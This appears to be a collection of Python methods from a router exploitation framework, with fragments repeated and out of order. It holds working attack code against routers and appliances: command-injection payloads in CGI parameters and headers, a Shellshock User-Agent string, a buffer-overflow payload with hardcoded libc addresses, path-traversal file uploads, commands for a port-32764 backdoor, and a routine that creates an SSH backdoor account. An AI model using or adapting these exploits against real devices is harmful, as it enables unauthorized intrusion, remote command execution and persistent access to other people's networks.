def check(self): number = int(random_text(6, alph=string.digits)) solution = number - 1 cmd = "echo $(({}-1))".format(number) marker = random_text(32) url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) for payload in self.payloads: injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd) headers = { self.header: injection, } response = http_request(method=self.method, url=url, headers=headers) if response is None: continue if str(solution) in response.text: self.valid = payload return True # target is vulnerable return False # target not vulnerable
def check(self): mark = random_text(32) cmd = "echo {}".format(mark) url = "{}:{}/apply.cgi".format(self.target, self.port) data = { "submit_button": "Diagnostics", "change_action": "gozila_cgi", "submit_type": "start_ping", "action": "", "commit": "0", "ping_ip": "127.0.0.1", "ping_size": "&" + cmd, "ping_times": "5", "traceroute_ip": "127.0.0.1" } response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) if response is None: return False # target is not vulnerable if mark in response.text: return True # target is vulnerable return False # target is not vulnerable
def execute(self, cmd): url = "{}:{}/cgi-bin/proxy.cgi".format(self.target, self.port) headers = {u'Content-Type': u'application/x-www-form-urlencoded', u'Referer': url} payload = "||{};#".format(cmd) data = {"NCSA_USERNAME": random_text(12), "NCSA_GROUP": "standard", "NCSA_PASS": payload, "NCSA_PASS_CONFIRM": payload, "SUBMIT": "Create+user", "ACTION": "Add", "NCSA_MIN_PASS_LEN": "6"} response = http_request(method="POST", url=url, headers=headers, data=data, auth=(self.username, self.password), timeout=10) if response is None: return "" end = response.text.find("<!DOCTYPE html>") if end: return response.text[:end] return ""
def check(self): mark = random_text(32) cmd = "echo {}".format(mark) url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port)) data = { "submit_button": "Diagnostics", "change_action": "gozila_cgi", "submit_type": "start_ping", "action": "", "commit": "0", "ping_ip": "127.0.0.1", "ping_size": "&" + cmd, "ping_times": "5", "traceroute_ip": "127.0.0.1" } response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) if response is None: return False # target is not vulnerable if mark in response.text: return True # target is vulnerable return False # target is not vulnerable
def check(self): fingerprint = random_text(10) cmd = "echo {}".format(fingerprint) response = self.execute(cmd) if fingerprint in response: return True return False
def check(self): marker = random_text(32) cmd = "echo {}".format(marker) response = self.execute(cmd) if marker in response: return True # target is vulnerable return False # target is not vulnerable
def check(self): url = "{}:{}/img/favicon.png?v=6.0.1-1213".format(self.target, self.port) response = http_request(method="GET", url=url) if response is not None and response.status_code == 200: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) target = self.target.replace("http://", "").replace("https://", "") try: ssh.connect(target, 22, timeout=5, username=random_text(8), password=random_text(8)) except paramiko.AuthenticationException: return True # target is vulnerable except: pass return False # target is not vulnerable
def check(self): mark = random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) if mark in response: return True return False
def run(self): self.session = requests.Session() if self.check(): print_success("Target seems to be vulnerable") if self.login(): if not self.newusername: self.newusername = random_text(8) if not self.newpassword: self.newpassword = random_text(8) self.create_ssh_backdoor(self.newusername, self.newpassword) # Log into the SSH backdoor account self.init_ssh_session(self.newusername, self.newpassword) else: print_error("Exploit failed. Could not log in") else: print_error("Exploit failed. Target seems to be not vulnerable.")
def check(self): """ Method that verifies if the target is vulnerable. """ rand_marker = random_text(6) command = "echo {}".format(rand_marker) if rand_marker in self.execute(command): return True return False
def execute2(self, cmd): print_status("Trying authenticated commad injection vulnerability...") # Iterate through hardcoded credentials and these provided by the user for creds in set(self.creds + [(self.username, self.password)]): print_status("Trying exploitation with creds: {}:{}".format(creds[0], creds[1])) # Fixate cookie url = "{}:{}/".format(self.target, self.port) cookies = { "SESSIONID": random_text(8) } response = http_request(method="GET", url=url, cookies=cookies, auth=(creds[0], creds[1])) if response is None: return False # Inject command url = "{}:{}/cgi-bin/tools_time.asp".format(self.target, self.port) payload = "\"%3b{}%26%23".format(cmd) data = {"SaveTime": "1", "uiCurrentTime2": "", "uiCurrentTime1": "", "ToolsTimeSetFlag": "0", "uiRadioValue": "0", "uiClearPCSyncFlag": "0", "uiwPCdateMonth": "0", "uiwPCdateDay": "", "&uiwPCdateYear": "", "uiwPCdateHour": "", "uiwPCdateMinute": "", "uiwPCdateSec": "", "uiCurTime": "N/A+(NTP+server+is+connecting)", "uiTimezoneType": "0", "uiViewSyncWith": "0", "uiPCdateMonth": "1", "uiPCdateDay": "", "uiPCdateYear": "", "uiPCdateHour": "", "uiPCdateMinute": "", "uiPCdateSec": "", "uiViewdateToolsTZ": "GMT+07:00", "uiViewdateDS": "Disable", "uiViewSNTPServer": payload, "ntp2ServerFlag": "N/A", "ntp3ServerFlag": "N/A"} response = http_request(method="POST", url=url, cookies=cookies, data=data, auth=(creds[0], creds[1])) if response is None: return False return True
def execute(self, cmd): libcbase = 0x2aaf8000 system = 0x000531FF calcsystem = 0x000158C8 callsystem = 0x000159CC shellcode = random_text(973) shellcode += struct.pack("<I", libcbase + system) shellcode += random_text(16) shellcode += struct.pack("<I", libcbase + callsystem) shellcode += random_text(12) shellcode += struct.pack("<I", libcbase + calcsystem) shellcode += random_text(16) shellcode += cmd url = "{}:{}/hedwig.cgi".format(self.target, self.port) headers = {'Content-Type': 'application/x-www-form-urlencoded'} cookies = {'uid': shellcode} data = random_text(7) + "=" + random_text(7) response = http_request(method="POST", url=url, headers=headers, data=data, cookies=cookies) if response is None: return "" return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
def check(self): base_url = sanitize_url('{0}:{1}/'.format(self.target, self.port)) upload_url = base_url + 'login.cgi' response = http_request(url=upload_url, method='GET') if (response is None): return False #Target not vulnerable rand_str = random_text(length=16) tmp_payload = tempfile.TemporaryFile() tmp_payload.write('vulnerable' + rand_str) tmp_payload.seek(0) upload_params = { 'file': ('../../../../tmp/airview.uavr', tmp_payload, { 'Expect': '' }) } response = http_request(url=upload_url, method='POST', files=upload_params) tmp_payload.close() if (response is None): return False #Target not vulnerable #Response to verify if the upload was done correctly airview_url = base_url + 'airview.uavr' verify_upload = http_request(url=airview_url, method='GET') #Upload empty file to "clear" the airview.uavr file clean_tmp_file = tempfile.TemporaryFile() clean_tmp_file.seek(0) upload_params = { 'file': ('../../../../tmp/airview.uavr', clean_tmp_file, { 'Expect': '' }) } http_request(url=upload_url, method='POST', files=upload_params) clean_tmp_file.close() if ('vulnerable' + rand_str in verify_upload.text): return True else: return False
def check(self): NUM_CHECKS = 5 # we try 5 times because the exploit tends to be unstable for _ in range(NUM_CHECKS): random_value = random_text(32) cmd = "echo {}".format(random_value) try: retval = self.execute(cmd) except socket.timeout: continue if random_value in retval: return True return False
def check(self): mark = random_text(32) cmd = "echo {}".format(mark) url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if mark in response.text: return True # target is vulnerable return False # target is not vulnerable
def check(self): mark = random_text(32) cmd = "echo {}".format(mark) url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and mark in response.text: return True # target is vulnerable return False # target is not vulnerable
def check(self): url = "{}:{}/utility.cgi?testType=1&IP=aaa".format(self.target, self.port) response1 = http_request(method="GET", url=url) if response1 is None: return False # target is not vulnerable if response1.status_code == 200: url = "{}:{}/{}.cgi".format(self.target, self.port, random_text(32)) response2 = http_request(method="GET", url=url) if response2 is None or response1.text != response2.text: return True # target is vulnerable return False # target is not vulnerable
def check(self): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) try: s.connect((self.target, 32764)) except socket.error: return False # target is not vulnerable s.send(random_text(12)) r = s.recv(0xC) while len(r) < 0xC: tmp = s.recv(0xC - len(r)) r += tmp sig, ret_val, ret_len = struct.unpack('<III', r) if sig == 0x53634D4D: self.endianness = "<" elif sig == 0x4D4D6353: self.endianness = ">" s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) s.connect((self.target, 32764)) mark = random_text(32) cmd = 'echo "{}"'.format(mark) response = self.execute(s, 7, cmd) s.close() if mark in response: return True # target is vulnerable return False # target is not vulnerable
def check(self): number = int(random_text(6, alph=string.digits)) solution = number - 1 cmd = "echo $(({}-1))".format(number) url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and str(solution) in response.text: return True # target is vulnerable return False # target is not vulnerable
def check(self): number = int(random_text(6, alph=string.digits)) solution = number - 1 cmd = "echo $(({}-1))".format(number) url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and str(solution) in response.text: return True # target is vulnerable return False # target is not vulnerable
def check(self): url = "{}:{}/utility.cgi?testType=1&IP=aaa".format( self.target, self.port) response1 = http_request(method="GET", url=url) if response1 is None: return False # target is not vulnerable if response1.status_code == 200: url = "{}:{}/{}.cgi".format(self.target, self.port, random_text(32)) response2 = http_request(method="GET", url=url) if response2 is None or response1.text != response2.text: return True # target is vulnerable return False # target is not vulnerable
def execute(self, cmd): mark = random_text(32) url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark) response = http_request(method="GET", url=url) if response is None: return "" if mark in response.text: regexp = "(|.+?){}".format(mark) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] return ""
def execute(self, cmd): mark = random_text(32) url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)) response = http_request(method="GET", url=url) if response is None: return "" if mark in response.text: regexp = "(|.+?){}".format(mark) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] return ""
def execute(self, cmd): mark = random_text(32) url = "{}:{}/login_handler.php".format(self.target, self.port) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark) response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return "" if mark in response.text: regexp = "(|.+?){}".format(mark) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] return ""
def execute(self, cmd): mark = random_text(32) url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark) response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return "" if mark in response.text: regexp = "(|.+?){}".format(mark) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] return ""
def execute(self, cmd): marker = random_text(16) cmd = cmd.replace(" ", "+") payload = "echo+{};{};echo+{};".format(marker, cmd, marker) inj = self.valid.format(payload) url = "{}:{}{}".format(self.target, self.port, inj) response = http_request(method="GET", url=url) if response is None: return "" regexp = "{}(.+?){}".format(marker, marker) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] return ""
def check(self): mark = random_text(32) cmd = "echo {}".format(mark) for resource in self.resources: url = ("{}:{}/{}?writeData=true®info=0&macAddress= " "001122334455 -c 0 ;{}; echo #".format(self.target, self.port, resource, cmd)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200: response_body = response.text if "Update Success!" in response_body and mark in response_body: self.valid_resource = resource return True # target is vulnerable return False # target is not vulnerable
def execute(self, cmd): mark = random_text(32) url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port) headers = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark) } response = http_request(method="GET", url=url, headers=headers) if response is None: return "" if mark in response.text: regexp = "%s(|.+?)%s" % (mark, mark) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] return ""
def check(self): url = "{}:{}/cgi-bin/index.cgi".format(self.target, self.port) marker = random_text(32) cmd = "echo {}".format(marker) payload = self.payload.replace("{{cmd}}", cmd) headers = { 'VULN': payload, } response = http_request(method="GET", url=url, headers=headers, auth=(self.username, self.password)) if response is None: return False # target is not vulnerable if response.status_code == 200 and marker in response.text: return True # target is vulnerable return False # target is not vulnerable
def check(self): base_url = sanitize_url('{0}:{1}/' .format(self.target, self.port)) upload_url = base_url + 'login.cgi' response = http_request(url=upload_url, method='GET') if(response is None): return False #Target not vulnerable rand_str = random_text(length=16) tmp_payload = tempfile.TemporaryFile() tmp_payload.write('vulnerable' + rand_str) tmp_payload.seek(0) upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})} response = http_request(url=upload_url, method='POST', files=upload_params) tmp_payload.close() if(response is None): return False #Target not vulnerable #Response to verify if the upload was done correctly airview_url = base_url + 'airview.uavr' verify_upload = http_request(url=airview_url, method='GET') #Upload empty file to "clear" the airview.uavr file clean_tmp_file = tempfile.TemporaryFile() clean_tmp_file.seek(0) upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})} http_request(url=upload_url, method='POST', files=upload_params) clean_tmp_file.close() if('vulnerable'+rand_str in verify_upload.text): return True else: return False
def execute(self, cmd): marker = random_text(32) url = "{}:{}{}".format(self.target, self.port, self.path) injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd) headers = { self.header: injection, } response = http_request(method=self.method, url=url, headers=headers) if response is None: return regexp = "{}(.+?){}".format(marker, marker) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] else: return ""
def execute(self, cmd): marker = random_text(32) url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd) headers = { self.header: injection, } response = http_request(method=self.method, url=url, headers=headers) if response is None: return regexp = "{}(.+?){}".format(marker, marker) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] else: return ""
def execute(self, cmd): url = "{}:{}/cgi-bin/index.cgi".format(self.target, self.port) marker = random_text(32) cmd = "echo {};{};echo{}".format(marker, cmd, marker) payload = self.payload.replace("{{cmd}}", cmd) headers = { 'VULN': payload, } response = http_request(method="GET", url=url, headers=headers, auth=(self.username, self.password)) if response is None: return "" if response.status_code == 200: start = response.text.find(marker) + len(marker) + 1 # marker and whitespace end = response.text.find(marker, start) - 48 return response.text[start:end] return ""
def check(self): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) try: s.connect((self.target, 32764)) except socket.error: return False # target is not vulnerable s.send(random_text(12)) r = s.recv(0xC) while len(r) < 0xC: tmp = s.recv(0xC - len(r)) r += tmp sig, ret_val, ret_len = struct.unpack('<III', r) if sig == 0x53634D4D: self.endianness = "<" elif sig == 0x4D4D6353: self.endianness = ">" s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(10) s.connect((self.target, 32764)) conf = self.execute(s, 1) s.close() lines = re.split("\x00|\x01", conf) if len(lines): return True # target is vulnerable return False # target is not vulnerable